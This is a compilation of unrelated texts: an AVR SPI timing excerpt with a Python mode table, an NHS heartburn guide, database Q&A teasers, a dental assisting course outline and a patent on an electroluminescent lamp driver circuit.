Parts which run at higher system clock frequencies, and SPI modules capable of running at speed grades up to half the system clock, require more specific timing to match the needs of both the sender and the receiver. The following two diagrams show the timing of the AVR in master and in slave mode for the CPHA = 0 modes. The exact values of the displayed times vary between the different parts and are not an issue in this application note; however, the functionality of all parts is in principle the same, so the following considerations apply to all parts.

[Master-mode SPI timing diagram]

The minimum timing of the clock signal is given by times "1" and "2": the value "1" specifies the SCK period, while the value "2" specifies the high/low times of the clock signal. The maximum rise and fall time of the SCK signal is specified by time "3". These are the first timings of the AVR to check against the requirements of the slave.

The setup time "4" and hold time "5" are important because they specify the requirements the AVR places on the interface of the slave. These times determine how long before the clock edge the slave has to have valid output data ready, and how long after the clock edge this data has to remain valid.

If the setup and hold times are long enough, the slave meets the requirements of the AVR; but does the AVR meet the requirements of the slave? The time "6" (Out to SCK) specifies the minimum time for which the AVR has valid output data ready before the clock edge occurs. This time can be compared to the setup time "4" of the slave.
The time "7" (SCK to Out) specifies the maximum time after which the AVR outputs the next data bit, while the time "8" (SCK to Out high) specifies the minimum time during which the last data bit remains valid on the MOSI line after SCK has been set back to its idle state.

[Slave-mode SPI timing diagram]

In principle, the timings in slave mode are the same as described above for master mode. Because the roles of master and slave are switched, the timing requirements are inverted as well: the minimum times of master mode become maximum times, and vice versa.

SPI transmission conflicts

A write collision occurs if the SPDR is written while a transfer is in progress. Since this register is only single-buffered in the transmit direction, writing to SPDR causes data to be written directly into the SPI shift register. Because this write operation would corrupt the data of the current transfer, a write-collision error is generated by setting the WCOL bit in the SPSR. The write operation is not executed in this case, and the transfer continues undisturbed. A write collision is generally a slave error, because a slave has no control over when a master will initiate a transfer. A master, however, knows when a transfer is in progress; thus a master should not generate write-collision errors, although the SPI logic can detect these errors in master as well as in slave mode.

When you set the SPI option from the Options > Compiler > SPI menu, SPCR will be set to 0b01010100, which means: enable SPI, master mode, CPOL = 1.

When you want to control the various options of the hardware SPI, you can use the CONFIG SPI statement.

See also: config SPI, Config SPIx, SPISLAVE, SPIINIT, SPIOUT, SPIIN, Using USI (Universal Serial Interface)
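Because the mode numbering in Table 3 matches the usual encoding mode = 2·CPOL + CPHA, the table can be expressed compactly in host-side tooling. A small Python sketch for reference (it is not AVR firmware):

SPI_MODES = {
    # mode: (CPOL, CPHA, shift SCK edge, capture SCK edge) -- from Table 3
    0: (0, 0, "falling", "rising"),
    1: (0, 1, "rising", "falling"),
    2: (1, 0, "rising", "falling"),
    3: (1, 1, "falling", "rising"),
}

def mode_from_bits(cpol, cpha):
    """Mode number as encoded in Table 3: CPOL is the high bit."""
    return (cpol << 1) | cpha

assert mode_from_bits(1, 0) == 2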
Heartburn

Learn more about heartburn: introduction

Heartburn is a burning feeling in the chest caused by stomach acid travelling up towards the throat (acid reflux). If it keeps happening, it's called gastro-oesophageal reflux disease (GORD).

Check if you have acid reflux

The main symptoms of acid reflux are:
• heartburn – a burning sensation in the middle of your chest
• an unpleasant sour taste in your mouth, caused by stomach acid

You may also have:
• a cough or hiccups that keep coming back
• a hoarse voice
• bad breath
• bloating and feeling sick

Your symptoms will probably be worse after eating, when lying down and when bending over.

Causes of heartburn and acid reflux

Lots of people get heartburn from time to time. There's often no obvious reason why. Sometimes it's caused or made worse by:
• certain food and drink – such as coffee, alcohol, chocolate, and fatty or spicy foods
• being overweight
• smoking
• pregnancy
• stress and anxiety
• some medicines, such as anti-inflammatory painkillers (like ibuprofen)
• a hiatus hernia – when part of your stomach moves up into your chest

How you can ease heartburn and acid reflux yourself

Simple lifestyle changes can help stop or reduce heartburn.

Do:
• eat smaller, more frequent meals
• raise one end of your bed 10 to 20cm by putting something under your bed or mattress – make it so your chest and head are above the level of your waist, so stomach acid doesn't travel up towards your throat
• try to lose weight if you're overweight
• try to find ways to relax

Don't:
• have food or drink that triggers your symptoms
• eat within 3 or 4 hours before bed
• wear clothes that are tight around your waist
• smoke
• drink too much alcohol
• stop taking any prescribed medicine without speaking to a doctor first

A pharmacist can help with heartburn and acid reflux

Speak to a pharmacist for advice if you keep getting heartburn. They can recommend medicines called antacids that can help ease your symptoms. It's best to take these with food or soon after eating, as this is when you're most likely to get heartburn. They may also work for longer if taken with food.

See a GP if:
• lifestyle changes and pharmacy medicines aren't helping
• you have heartburn most days for 3 weeks or more
• you have other symptoms, like food getting stuck in your throat, frequently being sick or losing weight for no reason

Your GP can provide stronger treatments and help rule out any more serious possible causes of your symptoms.

Treatment from your GP

To ease your symptoms, your GP may prescribe a medicine that reduces how much acid your stomach makes, such as a proton pump inhibitor (PPI). You may be prescribed one of these medicines for a month or two to see if your symptoms stop. Go back to your GP if your symptoms come back after stopping your medicine. You may need a long-term prescription.

Tests and surgery for heartburn and acid reflux

If medicines don't help or your symptoms are severe, your GP may refer you to a specialist for:
• tests to find out what's causing your symptoms, such as a gastroscopy (where a thin tube with a camera is passed down your throat)
• an operation to stop acid reflux – called a laparoscopic fundoplication

Content supplied by NHS Choices
0 votes, 1 answer, 20 views
Filtering the results of a SELECT query to avoid certain words in the value of a column?
I have a table called videos with a column named title, and there is a set of words (around 50 words as of now, but the number of words may increase) which is the knowledge base for filtering the ...

1 vote, 1 answer, 681 views
How to change the display of an empty string in the mysql command line tool?
I'm maintaining a database with InnoDB tables. These tables have some columns of type (from show create table): `val0` varchar(30) default NULL, `val1` varchar(30) default NULL, etc... From the ...
Effective: Summer 2011

D A 62B  DENTAL SCIENCES II  2 Unit(s)
Grade Type: Letter Grade; the student may select Pass/No Pass. Not Repeatable.
FHGE: Non-GE. Transferable: CSU.
2 hours lecture (24 hours total per quarter).

Student Learning Outcomes
• The student must be able to identify tooth abnormalities caused by an interruption in the tooth development process.
• The student will assess and identify a patient's caries risk and propose a plan to either arrest the patient's caries process or reduce further risk of decay.

Description
An overview of the embryologic development of the structures and tissues of the head, neck, teeth and oral cavity, and the histology of the hard and soft tissues of the oral cavity. Developmental and structural defects involving the oral cavity and the teeth. Periodontal diseases, the caries process and oral pathology. Intended for students in the Dental Assisting Program; enrollment is limited to students accepted in the program.

Course Objectives
The student will be able to:

Dental Assisting Theory & Practice
1. identify the stages of embryologic and fetal development of the head and oral cavity.
2. from a list of the tissues of the head and oral cavity, associate each with the germ layer from which it arises.
3. identify anomalies of the oral structures with failures of development of specific embryologic structures.
4. describe the appearance of, or recognize, specific types of facial and oral developmental anomalies.
5. list and describe common developmental defects involving the teeth.
6. list, in order, the stages of tooth development and describe the characteristic activities of each stage.
7. describe general pathology terms.
8. describe different types of pathology found in the oral cavity.
9. list and describe the tools available to identify the presence or absence of oral pathology and the information obtained by the use of each.
10. describe the caries process.
11. describe the AAP types of periodontal diseases and how periodontal disease develops.
12. briefly describe and define the processes of inflammation, regeneration, repair and healing.
13. list the most common dental infections and describe their course, treatment, and resolution.

Foothill College Dental Assisting Program Competencies
1. Dental Assisting Theory & Practice: dental assisting students must be competent in applying the theory and practice of dental assisting for persons of all ages and abilities.
2. Infection Control and Hazardous Waste Management: dental assistants must possess the knowledge and abilities to prevent the transmission of infectious diseases.
3. Ethical and Legal Principles: dental assisting students must be competent in understanding ethical/legal principles as applied to the dental office.

Special Facilities and/or Equipment
None

Course Content (Body of Knowledge)

Dental Assisting Theory & Practice
1. Stages of embryologic and fetal development of the head and oral cavity
   1. Prenatal development
      1. Preimplantation period
      2. Embryonic period
      3. Fetal period
2. Tissues of the head and oral cavity and the germ layers from which they arise
   1. Primary embryonic layers
      1. Ectoderm
      2. Mesoderm
      3. Endoderm
   2. Branchial arches
   3. Facial development
3. Anomalies of the oral structures due to development
   1. Cleft lip
   2. Cleft palate
4. Factors associated with facial and oral developmental anomalies
   1. Environmental
   2. Genetic
5. Common developmental defects
   1. Dens in dente
   2. Gemination/Fusion/Concrescence
   3. Congenitally missing teeth
   4. Amelogenesis imperfecta
   5. Dentinogenesis imperfecta
   6. Enamel pearl
   7. Supernumerary teeth
   8. Anodontia/Macrodontia/Microdontia
   9. Hutchinson's incisor
   10. Hypoplasia
6. Stages of tooth development
   1. Initiation
   2. Bud stage
   3. Cap stage
   4. Bell stage
   5. Apposition stage
   6. Maturation stage
7. General pathology terms
   1. Developmental disturbances and genetic diseases
   2. Inflammatory and infective disease
   3. Neoplastic growths
8. Types of pathology
   1. Developmental defects in oral structures and teeth
   2. Oral and dental infections
   3. Caries process
   4. Periodontal disease
   5. Oral cysts, benign and malignant tumors
   6. Oral manifestation of systemic disease
9. Identifying oral pathology
   1. Health history and oral inspection
   2. Radiographs
   3. Oral cytology and biopsy
10. Caries process
   1. Process of bacterial colonization
   2. Soft and hard deposits
   3. Demineralization
11. Periodontal diseases
   1. Gingivitis
   2. Periodontitis
      1. AAP type
   3. Process
   4. Prevention
12. Process of healing
   1. Inflammation
   2. Regeneration
   3. Repair
13. Common dental infections and their course, treatment, and resolution
   1. Candidiasis
   2. Herpes simplex
   3. Periapical or periodontal abscesses

Methods of Evaluation
1. Quizzes
2. Midterm
3. Final
4. Assignments

Representative Text(s)
Bird, D.L., Robinson, D.S., Modern Dental Assisting, 9th Edition, Philadelphia, PA, Saunders/Elsevier, 2009.
Bird, D.L., Robinson, D.S., Workbook to Modern Dental Assisting, 9th Edition, Philadelphia, PA, Saunders/Elsevier, 2009.
Miyasaki, C.M., Dental Health Education Syllabus, Revised 2009, Foothill College, Los Altos Hills, CA.
OPTIONAL (supplement, not required): Brand, Richard and Isselhard, Donald, Anatomy of Orofacial Structures, 7th Edition, St. Louis, C.V. Mosby, 2003.

Disciplines
Dental Assisting

Method of Instruction
Lecture, Discussion, Demonstration.

Lab Content
Not applicable.

Types and/or Examples of Required Reading, Writing and Outside of Class Assignments
1. Reading 4 chapters in the textbook.
2. Draw tooth development assignment.
3. Take practice tests in class.
Circuit for driving an electroluminescent lamp
US 5677599 A

Publication number: US5677599 A (also listed as: 08613381, 613381, US 5677599 A, US 5677599A, US-A-5677599, US5677599A)
Publication type: Grant
Application number: US 08/613,381
Publication date: Oct 14, 1997
Filing date: Mar 7, 1996
Priority date: Mar 7, 1996
Fee status: Paid
Inventors: Grady McConnell Wood
Original Assignee: Harris Corporation
Export citation: BiBTeX, EndNote, RefMan
External links: USPTO, USPTO Assignment, Espacenet
Images: 2

Abstract

A circuit for repeatedly switching current through an inductor for driving an electroluminescent lamp at alternating voltage levels having both peak positive and peak negative polarities. This circuit includes a circuit path having two zener diodes in series connection with the lamp. These zener diodes each have an anode and a cathode, and a breakdown voltage, and may have either their anodes or cathodes connected together. These zener diodes cause conduction along the circuit path in a first direction when a positive voltage driving the lamp exceeds the breakdown voltage of a first of the two zener diodes, to provide a peak detection signal representing that the lamp has reached the peak positive polarity voltage level. Further, these zener diodes cause conduction along the circuit path in a direction opposite the first direction when a negative voltage driving the lamp exceeds the breakdown voltage of a second of the two zener diodes, to provide a peak detection signal representing that the lamp has reached the peak negative polarity voltage level. The circuit has a polarity control circuit coupled to the circuit path. This control circuit switches the polarity of the voltage driving the lamp to a negative polarity in response to the positive peak detection signal and switches the polarity of the voltage to the lamp to a positive polarity in response to the negative peak detection signal.

Claims (9)

I claim:
1. A circuit for repeatedly switching current through an inductor for driving an electroluminescent lamp at alternating voltage levels having both peak positive and peak negative polarities, comprising: a circuit path having two zener diodes in series connection with said lamp, said zener diodes each having anode and cathode terminals, and a breakdown voltage, and said zener diodes having a pair of identical said terminals connected together; said zener diodes causing conduction along the circuit path in a first direction when a positive voltage driving the lamp exceeds the breakdown voltage of a first of said two zener diodes to provide a peak detection signal representing that the lamp has reached the peak positive polarity voltage level, and said zener diodes causing conduction along the circuit path in a direction opposite the first direction when a negative voltage driving the lamp exceeds the breakdown voltage of a second of said two zener diodes to provide a negative peak detection signal representing that the lamp has reached the peak negative polarity voltage level; and means, coupled to said circuit path, for switching the polarity of the voltage driving the lamp to a negative polarity in response to the positive peak detection signal, and switching the polarity of the voltage to the lamp to a positive polarity in response to the negative peak detection signal.

2. The circuit according to claim 1 further comprising: a supply terminal; a ground terminal; said inductor having first and second terminals; a first switch coupled between said supply terminal and the first terminal of said inductor, said first switch operating responsive to a first input signal; a second switch coupled between said ground terminal and said second terminal of said inductor, said second switch operating responsive to a second input signal; a third switch coupled between the first terminal of said inductor and the lamp for controlling a first unidirectional current path from said lamp to the first terminal of said inductor responsive to current charging from said inductor along the first path; and a fourth switch coupled between the second terminal of said inductor and the lamp for controlling a second unidirectional current path from said second terminal of the inductor to said lamp responsive to current discharging from said inductor along the second path.

3. The circuit according to claim 2 wherein said means for the switching further comprises: an oscillator providing an output signal; a flip-flop having a first output, a second output opposite said first output, a set input, a reset input, and a triggering circuit for applying a signal to one of the two inputs; said circuit path being connected to said lamp and said input circuit with said two zener diodes between said lamp and input circuit; an AND gate having two inputs and an output signal applied to the first input signal of said first switch, one of said inputs of said AND gate is coupled to the second output of said flip-flop, and the output signal of the oscillator is applied to the other said input of said AND gate; and a NAND logic device having two inputs and an output signal applied to said second input signal of said second switch, one of said inputs of said NAND gate is coupled to the first output of said flip-flop, and the output signal of the oscillator is applied to the other said input of said NAND gate.
4. The circuit according to claim 2 wherein said first switch comprises a PNP transistor having an emitter coupled to said supply terminal, a collector coupled to said first terminal of said inductor, and a base for receiving said first input signal.

5. The circuit according to claim 2 wherein said second switch comprises an NPN transistor having an emitter coupled to said ground terminal, a collector coupled to said second terminal of said inductor, and a base for receiving said second input signal.

6. The circuit according to claim 2 wherein said third and fourth switches comprise auto-triggering SCRs.

7. The circuit according to claim 3 wherein said flip-flop further comprises two cross-coupled transistors coupled to said inputs and said outputs.

8. A circuit for repeatedly switching current through an inductor for driving an electroluminescent lamp at alternating voltage levels having both peak positive and peak negative polarities, comprising: a circuit path having two zener diodes in series connection with said lamp, said zener diodes each having anode and cathode terminals, and a breakdown voltage, and said zener diodes having a pair of identical said terminals connected together; said zener diodes causing conduction along the circuit path in a first direction when a positive voltage driving the lamp exceeds the breakdown voltage of a first of said two zener diodes to provide a peak detection signal representing that the lamp has reached the peak positive polarity voltage level, and said zener diodes causing conduction along the circuit path in a direction opposite the first direction when a negative voltage driving the lamp exceeds the breakdown voltage of a second of said two zener diodes to provide a peak detection signal representing that the lamp has reached the peak negative polarity voltage level; and a polarity control circuit coupled to said zeners for alternately applying driving voltages of opposite polarity to the lamp in response to the peak detection signals.

9. The circuit according to claim 8 wherein said polarity control circuit comprises: a flip-flop for alternately coupling positive and negative driving voltages to the lamp in response to the peak detection signals.

Description

FIELD OF THE INVENTION

The present invention relates to a circuit for driving an electroluminescent (EL) lamp.

BACKGROUND OF THE INVENTION

EL lamps are used as light sources in miniature applications, such as wrist watches. These lamps have phosphor which glows when an AC voltage is applied. The AC voltage is supplied by an inverter circuit. The inverter circuit supplies a high AC voltage, such as 100 volts peak to peak, at low alternating frequencies of about 60 to 1,000 Hz. Examples of inverter circuits are described in U.S. Pat. No. 5,313,141, issued May 17, 1994 to R. A. Kimball, and U.S. Pat. No. 4,527,096, issued Jul. 2, 1985 to Kindlmann.

In EL-lamp miniature applications, the inverter circuit is implemented on an integrated chip (IC), and thus must operate on a very low voltage battery, typically one to three volts. To obtain the necessary high AC voltage levels to operate the EL-lamp, the inverter circuit has an inductor through which current is repeatedly switched on and off at a high frequency, such as 8-100 kHz. The inductor in response produces a high voltage which the circuit applies to the EL-lamp.
The inverter circuit generally has switches, typically transistors, which operate at a lower frequency, such as 60-1,000 Hz, to control the electrical connection between the inductor and the EL-lamp in concert with the alternating high voltage polarity. The inverter circuit described above therefore requires two clock signals: one operating at a high frequency to switch the inductor, and the other at a low frequency to control voltage polarity.

To generate the clock signals, typical wristwatch inverter circuits use an external clock input signal from a timekeeping chip, usually at 32 kHz, which is amplified and then divided down to two usable frequencies. The 32 kHz clock signal is divided down by a series of divider circuit stages. Each divider stage can divide the frequency by two, and generally requires six logic gates. For example, to generate 8 kHz and 250 Hz signals, the 32 kHz signal may be applied to two divider stages to obtain an 8 kHz signal, and then to four more divider stages to obtain a 250 Hz signal. Thus, six divider stages are needed, which requires a total of 36 gates. The number of gates can be reduced by having the timekeeping chip operate at 8 kHz and applying it to only four divider stages. Nevertheless, the added gates needed to implement the divider circuits increase the size and complexity of the IC, thereby increasing IC chip fabrication costs. In addition, an amplifier is needed to amplify the 32 kHz signal prior to dividing it down, which can cause a power drain on the battery. To accommodate this power drain, a higher capacity battery may be required, which also increases the cost and size of the circuit.

Alternatively, two separate internal oscillators, a low frequency oscillator and a high frequency oscillator, can be used to provide the two clock signal frequencies needed to operate the inverter circuit. These oscillators typically require capacitors external to the IC to control the frequency. The need for a low frequency oscillator, in addition to a high frequency oscillator, still increases the number of devices needed to implement the inverter circuit, thereby also increasing the cost and size of the IC. Moreover, the required external capacitors also increase the cost of the overall implementation of the inverter circuit. Accordingly, it is desirable to have an inverter circuit which requires neither a separate low frequency clock signal in addition to a high frequency clock signal, nor external capacitors.

Further, typical inverter circuits control the low frequency clock signal to maintain constant the frequency of the AC output voltage applied to the EL-lamp. As the battery is discharged with use, the frequency of the output voltage remains essentially constant while the peak to peak output voltage decreases as the battery nears the end of its life, and this decreasing peak to peak output voltage results in a reduction in the brightness of the EL-lamp. However, maintaining the frequency of the AC output voltage increases the complexity and fabrication cost of the IC, because of the additional circuitry needed to produce the separate low frequency clock signal, as described above.

SUMMARY OF THE INVENTION

Accordingly, an object of the present invention is to provide an improved circuit for driving an EL-lamp which eliminates the need to input a low frequency signal to an inverter circuit.
Another object of the present invention is to provide an improved circuit for driving an EL-lamp which maintains a relatively constant AC voltage, peak to peak, to the EL-lamp as the battery in the EL-lamp application runs down.

It is still another object of the present invention to provide an improved circuit for driving an EL-lamp which provides the EL-lamp with excellent brightness characteristics while reducing the number of devices needed to implement the circuit as compared with prior art circuits for driving an EL-lamp, thereby simplifying implementation and reducing the cost of IC manufacturing.

Briefly described, the present invention provides a circuit for repeatedly switching current through an inductor for driving an electroluminescent lamp at alternating voltage levels having both peak positive and peak negative polarities. This circuit includes a circuit path having two zener diodes in series connection with the lamp. These zener diodes each have anode and cathode terminals, and a breakdown voltage. These zener diodes also have a pair of identical terminals connected together. These zener diodes cause conduction along the circuit path in a first direction when a positive voltage driving the lamp exceeds the breakdown voltage of a first of the two zener diodes, to provide a peak detection signal representing that the lamp has reached the peak positive polarity voltage level. Further, these zener diodes cause conduction along the circuit path in a direction opposite the first direction when a negative voltage driving the lamp exceeds the breakdown voltage of a second of the two zener diodes, to provide a peak detection signal representing that the lamp has reached the peak negative polarity voltage level. The circuit also has a polarity control circuit coupled to the circuit path. This control circuit switches the polarity of the voltage driving the lamp to a negative polarity in response to the positive peak detection signal and switches the polarity of the voltage to the lamp to a positive polarity in response to the negative peak detection signal.

BRIEF DESCRIPTION OF THE DRAWING

The present invention will be better understood and appreciated more fully from the following detailed description, taken in conjunction with the accompanying drawing, in which:

FIG. 1 is a schematic diagram of a circuit embodying the present invention.

FIG. 2 is a schematic diagram illustrating an example of the flip-flop circuit in FIG. 1.

DETAILED DESCRIPTION OF THE INVENTION

Referring to FIG. 1, there is shown a circuit 10 of the present invention. Circuit 10 has a switching circuit 20 which is interconnected with a polarity control circuit 30. Switching circuit 20 switches current through an inductor L for driving an electroluminescent lamp 11 with an alternating voltage. A circuit path 32 couples circuits 20 and 30 and carries feedback signals to the polarity control circuit 30. Polarity control circuit 30, in response to these signals, alternates the polarity of the AC voltage to lamp 11 driven by switching circuit 20. Circuit 10 and its operation are described in more detail below.

The switching circuit includes a PNP transistor 12 and an NPN transistor 13, which are connected in series with inductor L across the supply terminal (VBAT) of a battery (not shown in FIG. 1) and the ground terminal (gnd). The bases of transistors 12 and 13 provide input lines which receive signals from polarity control circuit 30, which will be described later.
Also included in switching circuit 20 are switches 16 and 18 for controlling the direction of charging and discharging current to lamp 11. Lamp 11 is represented as a capacitive load in FIG. 1. Switch 16 is coupled via diode 5 between one side of the inductor and lamp 11, while switch 18 is coupled with diode 6 between the second terminal of inductor L and lamp 11. Diode 5 and diode 6 protect switch 16 and switch 18, respectively, from the high voltage transients produced by inductor L. Switches 16 and 18 are auto-triggering SCRs 2 and 4, respectively. SCR 2 switches on in response to a negative-going voltage transition pulse at the positive end of inductor L, which is caused by turning off transistor 12. SCR 4 switches on in response to a positive-going voltage transition pulse at the negative end of inductor L, which is caused by turning off transistor 13. In addition to SCR 2, switch 16 has the additional components of resistors 9 and 15, and diode 8. Likewise, switch 18 has the additional components of resistors 10 and 14 and diode 7. The operation and components of switches 16 and 18, including SCRs 2 and 4, are described in application Ser. No. 08,490,016, filed Jun. 13, 1995 by the same inventor as this application, which is herein incorporated by reference. The operation of switching circuit 20 is generally the same as the inverter circuit shown in FIG. 6 of the Kimball Patent, except that switching circuit 20 uses auto-triggering SCRs 2 and 4, which do not require the application of a low frequency signal to control their operation.

Polarity control circuit 30 has a set-reset flip-flop circuit 26 having set (S) and reset (R) inputs, and outputs O and Q to provide output signals Q1 and Q2, respectively. Output signal Q2 is the opposite of output signal Q1. Polarity control circuit 30 also has a triggering circuit 27 coupled to lamp 11, via circuit path 32, and connected to the set and reset inputs of flip-flop 26. Triggering circuit 27 includes two NPN transistors 34 and 35 which provide level shifting of the feedback peak detection signals, via circuit path 32, appropriate to trigger flip-flop 26 at its set and reset inputs. Circuit 27 and the peak detection signals are described in more detail later in the discussion of circuit 10 operation.

Circuit 10 also includes a digital oscillator 22 which is powered by VBAT from the battery and enabled by an ENABLE signal. Oscillator 22 provides an output signal Vout to polarity control circuit 30, as described below. Vout is a non-symmetrical output signal with a longer on time than off time. The frequency of oscillator 22 is set at 6 to 20 kHz, depending on the IC fabrication process used and the end application of lamp 11 with circuit 10. Oscillator 22 may be considered part of polarity control circuit 30, as shown in FIG. 1, or as an input to the polarity control circuit 30.

Interconnected with oscillator 22 and flip-flop 26 are AND gate 23 and NAND gate 24. Each gate 23, 24 has two inputs and one output representing the logical operation performed by the gate on its inputs. The output of AND gate 23 is connected to the base of transistor 12, while the output of NAND gate 24 is connected to the base of transistor 13. AND gate 23 receives the output signal from Q1 at one of its inputs and Vout at its other input. NAND gate 24 receives the output signal from Q2 at one of its inputs and Vout at its other input. Circuit path 32 couples triggering circuit 27 of polarity circuit 30 to lamp 11.
Circuit path 32 has two zener diodes 28 and 29, which are connected in series between lamp 11 and input circuit 27 with their anodes connected together. The cathode of zener diode 29 connects to lamp 11, while the cathode of zener diode 28 connects to input circuit 27. Alternatively, zener diodes 28 and 29 may have their cathodes connected together and their respective anodes connected to input circuit 27 and lamp 11. Each zener diode 28 and 29 has a breakdown voltage. Preferably, the breakdown voltages of the two zeners 28 and 29 are the same, in order to minimize the DC component of the voltage applied to load 11. In a circuit 10 implementation, the zener voltages available in any given IC fabrication process may be limited. Therefore, each zener diode may be formed by a series of more than one zener diode. The final breakdown voltage is then the sum of the zener diode voltages in series plus the forward diode voltages of the zener diode(s) connected in the opposite polarity.

Flip-flop 26 in circuit 10 may be simpler than standard flip-flop circuits, and the particular implementation of the flip-flop depends on the fabrication process chosen for the implementation of the IC EL driver chip. An example of an implementation of flip-flop 26 will be described later in connection with FIG. 2.

The signal pulses for operating circuit 10 of FIG. 1 may be described by FIG. 7 of the Kimball Patent, whereby: Signal B represents Vout from oscillator 22, except that Vout is not symmetrical, as described above. Signal A represents Q1 and Ā represents Q2. The output signal from AND 23 to transistor 12 is represented by X, and the output signal from NAND 24 to transistor 13 is represented by Y.

The operation of circuit 10 is as follows: Assuming an initial state for flip-flop 26 with Q1=0 (low) and Q2=1 (high), the output of AND gate 23 is always 0 (low), which turns on transistor 12 to connect VBAT to inductor L, and the output of NAND gate 24 follows Vout, thereby switching transistor 13 on and off with each Vout cycle. This operates switching circuit 20 to store positive voltage levels on lamp 11. Note that since Vout is a non-symmetrical signal, the on time for transistor 13 is longer than its off time for each cycle of Vout. Each time Vout completes one cycle, inductor L produces a voltage which charges lamp 11 through switch 18, and the voltage on lamp 11 has a positive step increase. The positive voltage level increases in these steps on lamp 11, but each step is about half the previous step. Thus, the capacitance of lamp 11 stores this voltage as a positive staircase.

When the voltage level on lamp 11 has exceeded the breakdown or zener voltage of zener diode 28, the desired peak positive voltage level of lamp 11, a positive peak detection signal or pulse is carried through zener diodes 28 and 29 of path 32 to triggering circuit 27. In triggering circuit 27, the positive peak detection signal provides a current flow into the base of NPN transistor 34, causing it to turn on and pull the reset input of flip-flop 26, which is connected to the collector of transistor 34, to a low state, thereby resetting the flip-flop. This resetting of flip-flop 26 changes Q1 to 1 (high) and Q2 to 0 (low). Now the output of NAND gate 24 is always 1 (high), which turns on transistor 13 to connect inductor L to gnd, and the output of AND gate 23 follows Vout, thereby switching transistor 12 on and off with each Vout cycle. This reverses the polarity of the voltage applied by switching circuit 20 to lamp 11 to negative.
Note that since Vout is a non-symmetrical signal, the on time for transistor 12 is longer than its off time for each cycle of Vout. For each cycle of Vout, inductor L produces a voltage which discharges lamp 11 through switch 16, and the voltage on lamp 11 has a negative step increase. Thus, with successive cycles of Vout, the negative voltage level increases in steps on lamp 11, but the size of each step is about half of the previous step. The capacitance of lamp 11 stores the voltage as a negative staircase.

When the voltage level on lamp 11 has exceeded the breakdown or zener voltage of zener diode 29, the desired peak negative voltage level on lamp 11, a negative peak detection signal or pulse is carried through the zener diodes 28 and 29 of path 32 to triggering circuit 27. In triggering circuit 27, the negative peak detection signal pulls the emitter of NPN transistor 35 below ground, causing base current to flow into its base, which is connected to ground. This causes the collector of NPN transistor 35, which is connected to the set input of flip-flop 26, to go to a low state, thereby causing flip-flop 26 to return to its set state. This return to the set state in flip-flop 26 changes Q1 to 0 (low) and Q2 to 1 (high). Switching circuit 20 then begins driving lamp 11 to a positive voltage level, as already described, and the above repeats until the ENABLE signal to oscillator 22 is removed.

Circuit 10 maintains a relatively constant positive peak to negative peak AC voltage level, such as 138 volts, across EL-lamp 11, and allows the frequency to vary as the battery powering circuit 10 and high frequency oscillator 22 runs down. This achieves the same result as the prior art circuits for driving an EL-lamp which maintain a relatively constant frequency, because the brilliance of the EL-lamp is relatively linear with both the voltage and the frequency applied to the lamp. Thus, when either voltage or frequency is maintained relatively constant as the battery runs down, the rate of decrease of the brilliance of the EL-lamp will be the same. However, maintaining a relatively constant AC voltage does not require the additional prior art components needed to generate a low frequency signal, thereby reducing the cost, complexity and size of the IC chip implementation. For example, the IC chip size reduction may be from 4,600 mils, using the dual oscillator prior art approach, to about 2,400 mils, which is about a 50% reduction. The actual area savings in IC chip size will vary depending on the IC fabrication process used to implement circuit 10. This is because the present invention, rather than requiring a second low frequency signal, uses the voltage level on lamp 11 to switch the polarity of the current being switched repeatedly through inductor L.

In circuit 10, flip-flop 26 may be simpler than standard flip-flop circuits, as stated earlier. Referring to FIG. 2, an example circuit of a simpler implementation of flip-flop 26 is shown. This implementation is appropriate if the chosen IC process is a bipolar process and the logic that follows the flip-flop is of a "Schottky Transistor Logic" (STL) type. The flip-flop has two cross-coupled NPN transistors 37 and 38, such that a collector (Schottky contact) A of each transistor is connected to the base of the other transistor. Both collector (Schottky) contacts A and B of each transistor are connected to constant current sources, and the emitters of the transistors are tied to ground.
The set and reset inputs are connected to the bases of transistors 37 and 38, respectively. The two complementary outputs, O and Q, are connected to collector B of transistors 37 and 38, respectively.

The flip-flop of FIG. 2 operates in circuit 10 as follows. In the first case, the load (11 in circuit 20) is driven positive until the zener voltage of zener diode 28 is reached. This causes base current to flow into the base of NPN transistor 34 in circuit 27, which causes the reset input of the flip-flop to be pulled low. When the reset input of the flip-flop is pulled low, transistor 38 is turned off. Once transistor 38 is turned off, both collector contacts rise as a result of the constant current sources. When collector A reaches a voltage level of 1 Vbe, transistor 37 turns on. With transistor 37 on, the base of transistor 38 is held low by the connection to transistor 37's collector A. This cross-connection of collector A of each transistor provides the two stable states of the flip-flop. The setting of the flip-flop is accomplished in a like manner, by pulling the set input low, which causes the flip-flop to enter the opposite state. Thus the logic-level output voltages are 1 Vbe, or about 0.6 volts, for a high level, and Vsat+V(Schottky), or about 0.3 volts, for a low. The constant current sources can be formed by PNP current mirrors in a bipolar process, or by high value resistors. In a CMOS process, the flip-flop can be formed by cross-coupled inverters.

The implementation of the present invention shown in FIG. 1 uses bipolar transistor devices; however, a MOS implementation, such as that shown in FIG. 2 of the Kindlmann Patent, may also be used, with the same removal of the dependency on a low frequency clock signal.

From the foregoing description, it will be apparent that there has been provided an improved circuit for driving an EL-lamp. Variations and modifications in the herein described circuit, in accordance with the invention, will undoubtedly suggest themselves to those skilled in the art. Accordingly, the foregoing description should be taken as illustrative and not in a limiting sense.
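The staircase behaviour described above is easy to picture with a toy model. The sketch below is not part of the patent and is not a circuit simulation; the threshold and first-step values are made-up constants chosen only to show a positive staircase whose steps halve on each oscillator cycle until the assumed zener threshold is crossed, which is the point at which the peak detection pulse would toggle flip-flop 26.

#include <cstdio>

int main() {
    // Assumed values for illustration only: a peak threshold of ~69 V
    // (about half of the 138 V peak-to-peak figure quoted above) and a
    // 40 V first charging step. Halving steps converge toward twice the
    // first step, so the threshold must lie below that limit.
    const double kZenerVolts = 69.0;
    double lampV = 0.0;
    double step  = 40.0;
    int cycles   = 0;

    while (lampV < kZenerVolts) {   // positive staircase on the lamp capacitance
        lampV += step;              // one Vout cycle adds one voltage step
        step  *= 0.5;               // "each step is about half the previous step"
        ++cycles;
        std::printf("cycle %d: lamp voltage %+6.1f V\n", cycles, lampV);
    }
    std::printf("peak detected after %d cycles; polarity would now reverse\n", cycles);
    return 0;
}

In the real circuit the step sizes are set by the inductor energy and the lamp capacitance rather than by an exact factor of one half, and after the peak the same process repeats toward the negative threshold of zener diode 29.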
Patent Citations

Cited patents:
- US4527096 * (filed Feb 8, 1984; published Jul 2, 1985; Timex Corporation): Drive circuit for capacitive electroluminescent panels
- US5172032 * (filed Mar 16, 1992; published Dec 15, 1992; Alessio David S): Method of and apparatus for the energization of electroluminescent lamps
